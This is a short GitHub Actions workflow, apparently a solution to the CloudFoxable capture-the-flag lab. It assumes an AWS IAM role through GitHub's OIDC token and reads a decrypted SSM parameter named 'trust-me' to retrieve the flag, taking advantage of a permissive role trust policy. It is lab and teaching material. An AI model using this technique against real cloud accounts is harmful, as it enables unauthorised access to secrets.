name: Cloudfoxable flag
on:
  push:    
    branches: [ main ]
jobs:
  deploy:
    name: retrive flag
    runs-on: ubuntu-latest
    # These permissions are needed to interact with GitHub's OIDC Token endpoint.
    permissions:
      id-token: write
      contents: read
    steps:
    - name: Configure AWS credentials from Test account
      uses: aws-actions/configure-aws-credentials@v4
      with:
        role-to-assume: arn:aws:iam::730335471071:role/t_rodman
        aws-region: us-west-2
    - name: Retrieve the secrets with the AWS CLI
      run: |
        aws --region us-west-2 ssm get-parameter --with-decryption --name trust-me

